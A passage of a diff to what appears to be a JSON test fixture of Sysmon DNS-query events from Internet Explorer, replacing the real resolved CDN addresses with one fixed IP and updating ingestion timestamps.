+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "72.21.91.29"
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -14336,13 +14174,13 @@ "status.thawte.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742177500Z", + "ingested": "2021-12-09T13:50:23.457381100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", 
@@ -14421,47 +14259,47 @@ "type": "CNAME" }, { - "data": "38.134.110.101", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.143", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.171", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.177", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.104", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.114", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "38.134.110.101", - "38.134.110.143", - "38.134.110.141", - "38.134.110.171", - "38.134.110.177", - "38.134.110.115", - "38.134.110.104", - "38.134.110.114" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -14479,20 +14317,13 @@ "ads.stickyadstv.com" ], "ip": [ - "38.134.110.101", - "38.134.110.143", - "38.134.110.141", - "38.134.110.171", - "38.134.110.177", - "38.134.110.115", - "38.134.110.104", - "38.134.110.114" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742186Z", + "ingested": "2021-12-09T13:50:23.457387Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", 
@@ -14560,12 +14391,12 @@ "type": "CNAME" }, { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { 
@@ -14582,13 +14413,13 @@ "hbx.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742194400Z", + "ingested": "2021-12-09T13:50:23.457392900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14652,27 +14483,27 @@ "type": "CNAME" }, { - "data": "151.101.194.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.49", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.194.49", - "151.101.2.49", - "151.101.66.49", - "151.101.130.49" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -14688,16 +14519,13 @@ "match.taboola.com" ], "ip": [ - "151.101.194.49", - "151.101.2.49", - "151.101.66.49", - "151.101.130.49" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742203Z", + "ingested": "2021-12-09T13:50:23.457398700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14761,17 +14589,17 @@ "type": "CNAME" }, { - "data": "23.50.53.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.185", - "23.50.53.194" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -14787,14 +14615,13 @@ "img-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.185", - "23.50.53.194" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742211500Z", + "ingested": "2021-12-09T13:50:23.457404600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14858,17 +14685,17 @@ "type": "CNAME" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.186", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -14884,14 +14711,13 @@ "static-entertainment-eus-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742219900Z", + "ingested": "2021-12-09T13:50:23.457410300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -14959,12 +14785,12 @@ "type": "CNAME" }, { - "data": "23.217.149.91", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.217.149.91" + "89.160.20.156" ] }, "network": { 
@@ -14981,13 +14807,13 @@ "radarmaps.weather.microsoft.com" ], "ip": [ - "23.217.149.91" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742228100Z", + "ingested": "2021-12-09T13:50:23.457416Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
